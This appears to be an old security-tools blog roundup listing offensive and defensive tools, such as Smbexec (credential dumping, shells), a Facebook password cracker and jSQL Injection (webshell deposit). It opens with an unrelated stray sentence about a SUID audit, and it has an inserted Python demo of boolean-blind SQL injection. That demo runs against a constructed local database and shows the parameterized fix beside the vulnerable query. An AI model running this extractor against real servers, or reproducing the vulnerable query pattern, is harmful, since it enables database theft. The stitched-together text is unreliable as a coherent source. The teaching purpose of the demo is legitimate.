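The demo tree sets only the SUID bit, because a non-root owner's SGID bit is silently dropped when the file's group is not one of the owner's groups; on a real host the audit reads both bits, and the ww_suid_sgid list is the one that warrants an immediate fix.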

[Dumpper v.30.2] Wireless network manager

Dumpper is a wireless network manager with which we can connect to our network, among other things.

Open the program, click "Escanear" and the available networks will appear on screen; select ours, enter the key in the "Key" box, then click "Conectar" and that's it.

I have also added a function that shows the default keys of WLAN_XXXX and JAZZTEL_XX networks with compatible MACs.

I have also included a profile manager with which we can add, delete or connect to whichever profiles we want. Select the network and click the "Añadir a perfiles" button. The "Perfiles" tab will open automatically, where we can see the details of the created profiles, the local parameters of the network connection, the link quality, etc. I have included an option in case you want to enter the key in ASCII instead of hexadecimal; tick the box next to "Key" if that is the case.

And well, what the Guardar, Eliminar and Activar buttons are for is quite clear; I don't think it needs explaining..

--------------------------------------------------------------------

Added a new tab called "Tools" that includes a section for pinging the specified IP or host, another section for scanning the ports we have open, and another section that is an IP scanner.



[Sandy v0.1] Open-source Samsung phone encryption assessment framework


Sandy is an open-source Samsung phone encryption assessment framework. Sandy has different modules that allow you to carry out different attack scenarios against encrypted Samsung phones. For the details check our Derbycon 3.0 presentation (What's common in Oracle and Samsung? They tried to think differently about crypto).

Requirements

  • It was developed with Python 2.7.
  • Most of the modules work on OS X.
  • Every module should work on Kali Linux.
  • You need the pexpect, pbkdf2 and pyCrypto Python modules.

Wednesday 9 October 2013

[Smbexec v2.0] A rapid tool based on psexec style attack with samba tools


A rapid tool based on psexec style attack with samba tools.

Key features
  • Enumerate systems with domain admin logged in
  • Grab hashes
  • Extract cached creds (based on cachedump)
  • Remote Login Validation
  • Dump cleartext credentials
  • Pop shells

Includes
  • smbexec.sh
  • installer.sh
  • patches to compile binaries
  • source for samba-3.6.9 and winexe-1.00

Credit where credit is due:

    [WFacebook] Facebook Password Cracker


    Facebook Password Cracker.


    [PoshSec Framework v0.2] Graphical Interface for Powershell scripts


    The PoshSec Framework is a tool that is designed to provide a graphical interface for powershell scripts, functions, modules, and cmdlets.

    It allows the community to write scripts that can interact with the interface by providing alerts, and output directly from their powershell scripts. This framework can be used for offensive, defensive, or simply system administrative tasks.

    The PoshSec Framework is not merely a defense tool. It can be used for offense, defense, and even system administration. The whole idea is to give people a tool for PowerShell that isn't just a command line. The roadmap is to add graphs, a dashboard, scheduling, reporting, etc. This is a very active project and I encourage you to download it and see what it can do for you. The sky is the limit. This project is not the sum of its code. It's the sum of what the community wants to invest into it.


    Wednesday 2 October 2013

    [jSQL Injection v0.5] Java tool for automatic database injection


    jSQL Injection is a lightweight application used to extract database information from a remote server.

    jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

    jSQL Injection change log - version 0.5

    0.5
    • SQL shell
    • Uploader
    0.4
    • Admin page checker and preview
    • Brute forcer (md5 mysql...)
    • Coder (encode decode base64 hex md5...)
    0.3
    • Distant file reading
    • Webshell deposit
    • Terminal for webshell commands
    • Configuration backup
    • Update checker
    0.2
    • Time based algorithm
    • Multi-thread control (start/pause/resume/stop)
    • Shows URL calls
    0.0 and 0.1
    • GET, POST, header, cookie methods
    • Normal, error based, blind algorithms
    • Automatic best algorithm selection
    • Progression bars
    • Simple evasion
    • Proxy setting
    • Supports MySQL 
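    The "blind" algorithm in the change log above infers data from a yes/no observable (page returned a row or not) rather than from an echoed value. The following is an added example, not jSQL's own code: a deliberately vulnerable lookup against a constructed in-memory SQLite database, a boolean-based extractor that recovers a column one character at a time by binary search on the character code, and the parameterized fix alongside. Python and SQLite stand in for the Java tool and the remote MySQL server; the table, column and row names are constructed for the demo.

```python
"""Boolean-based blind SQL injection demo with the hardened query beside it.

Constructed example: an in-memory SQLite database stands in for the remote
server, and the only observable is whether the query matched a row.
"""
import sqlite3

# Constructed sample data (not from any real system).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
_conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                  [(1, "alice", "s3cr3t"), (2, "bob", "hunter2")])


def vulnerable_lookup(user_id: str) -> bool:
    """Vulnerable: untrusted input is concatenated into the SQL text.
    Returns only whether a row matched, which is all a blind injection needs."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return _conn.execute(sql).fetchone() is not None


def safe_lookup(user_id: str) -> bool:
    """Hardened: the value is bound as a parameter, so an injected
    'AND ...' clause is compared as data and never parsed as SQL."""
    row = _conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def blind_extract(oracle, column: str, table: str, row_filter: str,
                  max_len: int = 32) -> str:
    """Recover TEXT column `column` from the row selected by `row_filter`
    using only a true/false oracle.  For each position the character code
    (0..127) is found by binary search, ~7 requests per character; an empty
    substr() (past the end of the value) yields NULL, which makes every
    comparison false and drives the search to 0, our end-of-string marker."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # '1' is a known-existing id, so the row appears iff the
            # injected condition is true.
            payload = ("1 AND unicode(substr((SELECT %s FROM %s WHERE %s),%d,1)) > %d"
                       % (column, table, row_filter, pos, mid))
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    print(blind_extract(vulnerable_lookup, "secret", "users", "name='alice'"))
    print(safe_lookup("1"), safe_lookup("1 AND 1=1"))  # True, False
```

A time-based variant (also listed in the change log) is the same search with the observable swapped: the injected condition guards a deliberate delay, and the oracle becomes "did the response take longer than the threshold". The defense does not change: binding parameters as in `safe_lookup` removes both channels at once.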

    [Matriux Leandros v3.0 rc1] The pentesting distrib (Now added Blackhat Arsenal 2013 Tools)


    Matriux is a Debian-based security distribution designed for penetration testing and forensic investigations. Although it is primarily designed for security enthusiasts and professionals, it can also be used by any Linux user as a desktop system for day-to-day computing. Besides standard Debian software, Matriux also ships with an optimised GNOME desktop interface, over 340 open-source tools for penetration testing, and a custom-built Linux kernel.

    Matriux was first released in 2009 under code name “lithium” and then followed by versions like “xenon” based on Ubuntu. Matriux “Krypton” then followed in 2011 where we moved our system to Debian. Other versions followed for Matriux “Krypton” with v1.2 and then Ec-Centric in 2012. This year we are releasing Matriux “Leandros” RC1 on 2013-09-27 which is a major revamp over the existing system.


    The Matriux arsenal is divided into sections with a broad classification of tools for Reconnaissance, Scanning, Attack Tools, Frameworks, Radio (Wireless), Digital Forensics, Debuggers, Tracers, Fuzzers and other miscellaneous tools, covering the steps of a complete penetration test and forensic scenario. Many questions were raised about why another security distribution is needed when one already exists; we believed in and followed the free spirit of Linux in making one. We always try to stay current with tool and hardware support, so we include the latest tools and compile a custom kernel to keep abreast of the latest technologies in information security. This version includes a new section of PCI-DSS tools.

    Matriux is also designed to run from a live environment such as a CD/DVD or USB stick, which is helpful in computer forensics and data recovery: forensic analysis, investigation and retrieval not only from physical hard drives but also from solid-state drives and the NAND flash used in smartphones such as Android devices and the iPhone. With Matriux Leandros we also support and work with projects and tools that have been discontinued over time, and we keep track of the latest tools and applications developed and presented at recent conferences.

    Features (notable updates compared to Ec-Centric):

    • Custom kernel 3.9.4 (patched with aufs, squashfs and xz filesystem mode; includes support for a wide range of wireless drivers and hardware, including the Alfa card 0036NH)
    • USB persistence
    • Easy integration with VirtualBox and VMware Player, even in Live mode.
    • MID has been updated to make installation easy; see http://www.youtube.com/watch?v=kWF4qRm37DI
    • Includes the latest tools introduced at Black Hat 2013 and DEF CON 2013; build updated until September 22, 2013.
    • UI inspired by Greek mythology
    • New PCI-DSS section added
    • IPv6 tools included.

    [Kvasir] Tools for effective data management during a Penetration Test


    Welcome to Kvasir! Herein these directories lay the groundwork tools for effective data management during a Penetration Test.

    Penetration tests can be data management nightmares because of the large amount of information that is generally obtained. Vulnerability scanners return lots of actual and potential vulnerabilities to review. Port scanners can return thousands of ports for just a few hosts. How easy is it to share all this data with your co-workers?

    That's what Kvasir is here to help you with. Here's what you'll need to get started:

    •     The latest version of web2py (http://www.web2py.com/)
    •     A database (PostgreSQL known to work)
    •     A network vulnerability scanner (Nexpose/Nmap supported)
    •     Additional python libraries

    Kvasir is a web2py application and can be installed separately for each customer or task. This design keeps data separated and keeps you from accidentally attacking or reviewing other customers' systems.

    This tool was developed primarily for the Cisco Systems Advanced Services Security Posture Assessment (SPA) team. While not every method used by the SPA team may directly relate we hope that this tool is something that can be molded and adapted to fit almost any working scenario.

    [Hook Analyser v2.6] Application (and Malware) Analysis tool


    Application (and Malware) Analysis tool. Hook Analyser is a hooking tool that can be helpful in reversing applications and analysing malware.

    Changelog v2.6

    • Added new signatures (and removed redundant ones)
    • Bug fixes. Many thanks to community users for reporting them.
    • Fixed start-up error.
    More Information: